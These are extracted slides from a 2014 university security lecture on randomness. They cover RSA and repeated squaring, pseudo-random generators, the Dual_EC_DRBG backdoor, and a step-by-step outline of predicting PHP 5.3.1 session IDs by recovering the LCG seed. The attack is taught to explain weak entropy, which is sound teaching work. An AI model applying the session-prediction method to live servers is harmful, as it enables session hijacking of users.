On randomnessComputer Security 2014 – Ymir Vigfusson

Some slides borrowed from Luis von Ahn‘s 15-251 class @ CMU

2

Plan for today

Suppose we want to communicate securely when an adversary can intercept us and do MITM attacks Think back to the problem the Enigma tried

to solve We‘ve learned that one-time pad is secure▪ But we cannot practically exchange keys that long

Issue: Machines are inherently deterministic▪ Strength of encryption scheme at best as good as

the key▪ The building block of modern encryption is

randomness

We will learn how this is done today assuming we have random numbers at our disposal The famous RSA protocol

3

Plan for today

Part 1: Assuming we have random numbers, how can we do secure message exchange? That is, how does RSA work?

Part 2: But how can we create random numbers? Computers make do with pseudo-random

numbers

Part 3: Pitfalls of pseudo-random number generators (PRNGs) PHP session IDs Various Internet attacks (including on RSA)

How do you compute…

58

First idea:

5 52 53 54 55 56 57 58

= 5*5= 52*5

using few multiplications?

How do you compute…

58

Better idea:

5 52 54 58

= 5*5= 52*52= 54*54

Used only 3 multsinstead of 7 !!!

Repeated squaring calculatesa2k

in k multiply operations

compare with(2k – 1) multiply

operationsused by the naïve

method

How do you compute…

513

516

too high! what now?

assume no divisions allowed…

Use repeated squaring again?

5 52 54 58

How do you compute…

513

Use repeated squaring again?

5 52 54 58

Note that 13 = 8+4+1

So a13 = a8 * a4 * a1

Two more multiplies!

1310 = (1101)2

To compute am

Suppose 2k ≤ m < 2k+1

a a2 a4 a8

This takes k multiplies

Now write m as a sum of distinct powers of 2

am = a2k * a2i1 * … * a2it

a2k. . .

say, m = 2k + 2i1 + 2i2 … + 2it

at most k more multiplies

Hence, we can compute am (mod n)

while performing at most 2 log2 m multiplies

where each time we multiplytogether numbers

with log2 n + 1 bits

How do you compute…

513 (mod 11)

First idea: Compute 513 using 5 multiplies

5 52 54 58 512 513

= 58*54= 512*5

then take the answer mod 11

= 1 220 703 125

1220703125 (mod 11) = 4

How do you compute…

513 (mod 11)

Better idea: keep reducing the answer mod 11

5 52 54 58 512 513

11 3 11 911 81 11 36 11 1511 4 11 3 11 4

25

Pretty good! We‘ll come back to this in a bit

Zn = {0, 1, 2, …, n-1}

Zn* = {x Zn | GCD(x,n) =1}

Now, recall the following:

Examples:

Z8 = {1, 3, 5, 7}Z11 = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10}

Euler Phi Function Φ(n)

Φ(n) = size of Zn*

p prime Φ(p) = p-1

p, q distinct primes Φ(pq) = (p-1)(q-1)

How do you compute…

5121242653 (mod 11)

The current best idea would stillneed about 54 calculations

answer = 4

We can actually do better using Φ(n):

Importantly, we can do this fast!

for a Zn*, ax n ax mod Φ(n)

Euler’s Theorem

For a Zn*, a Φ(n) = 1 mod n

Corollary: Fermat’s Little Theorem

For p prime, a Zp* ap-1 = 1 mod p

Key result needed, and the key to RSA

Pick secret, random large primes: p,q Multiply n = p*q

“Publish”: n

(n) = (p) (q) = (p-1)*(q-1)Pick random e Z*

(n)

“Publish”: e

Compute d = inverse of e in Z*(n)

Hence, e*d = 1 [ mod (n) ]“Private Key”: d

RSA algorithm

n,e is my public key. Use it to

send me a message.

p,q random primese random Z*

(n)

n = p*qe*d = 1 [ mod (n) ]

n, e

p,q prime, e random Z*(n)

n = p*qe*d = 1 [ mod (n) ]

message m

me [mod n]

(me)d n m

?

p=11,q=3 primes, e = 3

n = p*q = 33

message m=7

?

?

How hard is cracking RSA?

If we can factor products of two large primes, can we crack RSA?

If we know n and Φ(n), can we crack RSA?

How about the other way? Does cracking RSA mean we must do one of these two?

We don’t know (yet)…

22

Part 2: Can we create random numbers? RSA relies fundamentally on availability of

random numbers Random primes p and q, and random exponent e

However, computers by themselves cannot generate random numbers! They are, as we said before, fundamentally

deterministic Need external sources, and to use those sparingly

Khan academy has a nice introduction to the topic https://

www.khanacademy.org/computing/computer-science/cryptography/crypt/v/random-vs-pseudorandom-number-generators

23

How do we create random numbers? You could buy an exciting book!

http://www.amazon.com/Million-Random-Digits-Normal-Deviates/dp/0833030477

You could hook up a Lava lamp!

... or a Geiger counter

Not terribly practical!

24

How do we create random numbers? In practice we use pseudo-random

number generators (PRNGs)

Rely on external sources for initial randomness Here is the diagram for the Linux PRNGs:

25

How do we create random numbers? PRNG PDF

26

Part 3: Weaknesses in PRNGs

In 2012, two research groups looked at gcd(n1,n2) for RSA public keys on the Internet (e.g. SSL/SSH) If any pair of keys share a prime, easy to

crack!

A wide range of devices (routers, firewalls, VPN...) had these weak keys Too little entropy on the devices to

generate strong keys

27

Weaknesses in PRNGs

Dual_EC_DRBG NSA backdoor PRNG designed in 2000s based on elliptic curves Makes use of some magic values P and Q. ▪ Shown in 2007 that if someone deliberately created these

values, they could decrypt traffic after seeing only 32 random bytes

RSA adopts Dual_EC_DRBG as default in BSAFE in 2004▪ Not used by OpenSSL and others, however.

Standardized by NIST in 2005 Snowden‘s leaks in 2013 reveal NSA placed a backdoor▪ „NSA became the only editor of the standard“▪ Paid $10m to RSA to have the company use it as a default

Presidential advisory committee investigating NSA‘s conduct

„Nothing up my sleeve numbers“

28

Internet Cookies

29

Internet Cookies

A user spends effort logging into syndis.is

Web server could require log-in information in each following packet to ensure credentials Cumbersome and expensive

Instead, syndis.is hands out a temporary „badge“ (cookie) to the user User submits copy of the cookie on every request Doesn‘t matter if the user gets a new IP address –

nice!

What if badges were numbered 1, 2, 3, ... ? Need to have cookie strings unpredictable!

30

PHP 5.3.1 Session ID generationFrom php-5.3.1/ext/session/session.c:PHPAPI char *php_session_create_id(PS_CREATE_SID_ARGS)…gettimeofday(&tv, NULL);…/* maximum 15+19+19+10 bytes */spprintf(&buf, 0, "%.15s%ld%ld%0.8F", remote_addr, tv.tv_sec, (long int)tv.tv_usec, php_combined_lcg() * 10);…return buf;

31

How much entropy?

Client IP address 4 bytes

Variable Entropy

Client IP address 32-bits

Current epoch 32-bits

Current microseconds (0-1,000,000)

<20-bits

Random value from php_combined_lcg()

64-bits

Total 148-bits

32

Let‘s dissect the components

Can we guess the current epoch?

Session IDs are normally generated when someone logs in

On social networking sites, user appears be visible On Facebook and Gmail, dot turns green „Who‘s logged on“ updated

Can find offset of our time vs. server time using HTTP HEAD request

HEAD / HTTP/1.0

HTTP/1.1 200 OKDate: Mon, 12 Jul 2010 04:30:45 GMTServer: Apache/2.2.3 (CentOS)Last-Modified: Sat, 15 May 2010 00:50:56 GMTRetag: "d664e-66-6267dc00"Accept-Ranges: bytesContent-Length: 102Connection: closeContent-Type: text/html; Charset=UTF-8

33

Let‘s dissect the components

Can we find the victim‘s IP address?

Attacker may already know the address Victim behind common proxy, such as

proxy.emory.edu

Can lure the victim into clicking a link Obtain IP address (Could even do something more nefarious)

So we can usually know the IP address

34

What do we have?

We reduced 148-bits (prehashed) Know 64 of these bits, so 84-bits remaining

Still a feat to crack...

What about the remaining session ID components?

35

How much entropy?

Client IP address 4 bytes

Variable Entropy

Client IP address 32-bits

Current epoch 32-bits

Current microseconds (0-1,000,000)

<20-bits

Random value from php_combined_lcg()

64-bits

Total 84-bits

36

Dissecting the PRNG

php_combined_lcg() uses a LCG Linear Congruential Generator, standard PRNG

PHPAPI double php_combined_lcg(void) { php_int32 q, z; if (!LCG(seeded)) { lcg_seed(); } MODMULT(53668, 40014, 12211, 2147483563L, LCG(s1)); MODMULT(52774, 40692, 3791, 2147483399L, LCG(s2)); z = LCG(s1) - LCG(s2); if (z < 1) { z += 2147483562; } return z * 4.656613e-10;}

static void lcg_seed(void) { struct timeval tv; if (gettimeofday(&tv, NULL) == 0) { LCG(s1) = tv.tv_sec ^ (~tv.tv_usec); } else { LCG(s1) = 1; } LCG(s2) = (long) getpid(); LCG(seeded) = 1;}

Pids on UNIX usually 15-bitsCould maybe even find it out...

What‘s going on here?

37

Timestamp manipulation

LCG(s1) = tv.tv_sec ^ (~tv.tv_usec);

1100111001000010110000110010101

1111111111110111010010101110010

tv.tv_sec

Most uncertainMost certain

~tv.tv_usec

XOR

0011000110110101100010011100111

=

Timestamp provides only 20 bits of entropy!

38

Dissecting the PRNG

We have narrowed down the internal state of the random number generator (LCG) to 15+20 bits Specifically variables s1 and s2

How do we make use of this information?

39

PHP 5.3.1 Session ID generationFrom php-5.3.1/ext/session/session.c:PHPAPI char *php_session_create_id(PS_CREATE_SID_ARGS)…gettimeofday(&tv, NULL);…/* maximum 15+19+19+10 bytes */spprintf(&buf, 0, "%.15s%ld%ld%0.8F", remote_addr, tv.tv_sec, (long int)tv.tv_usec, php_combined_lcg() * 10);…return buf;

40

Dissecting the PRNG

We just create a session by ourselves! A part of our session ID will be the current

value of php_combined_lcg()

We can then brute force the value that lcg_seed() produced initially We thus know the values of s1 and s2 In other words, we know what

php_combined_lcg() will return before it does!

Important: We calculate the PRNG state locally. No need to send requests to the server

41

How much is left for each session? Client IP address

4 bytesVariable Entropy

Client IP address 32-bits

Current epoch 32-bits

Current microseconds (0-1,000,000)

<20-bits

Random value from php_combined_lcg()

64-bits

Total 20-bits

42

PHP attack, summary

The session ID in PHP 5.3.1 has four components.

Client IP address: known by attacker Timestamp in sec: known by attacker Microseconds: unknown

Must brute-force these ~20 bits with individual packets PRNG output:

We create a new session to see the next value of php_combined_lcg()

We brute-force the seed used offline▪ Only (20+15)-bits actually needed because of a bug

We determine how many sessions have been opened on the server to make a good guess

Only need to do this once between PHP restarts!

We could predict future session cookies... pretty bad!

43

Optional lab: Blackjack! (+5%)

We‘ve put information in „blackjack.login“ in your home directory

Goal: Win $10,000,000 credits! You start off with $10,000

Standard blackjack rules. Grade is min(10, credits / 10M) You get one free refill (delaying inevitable

gambler‘s ruin)

Information and scoreboard: http://hhg.to/blackjack.php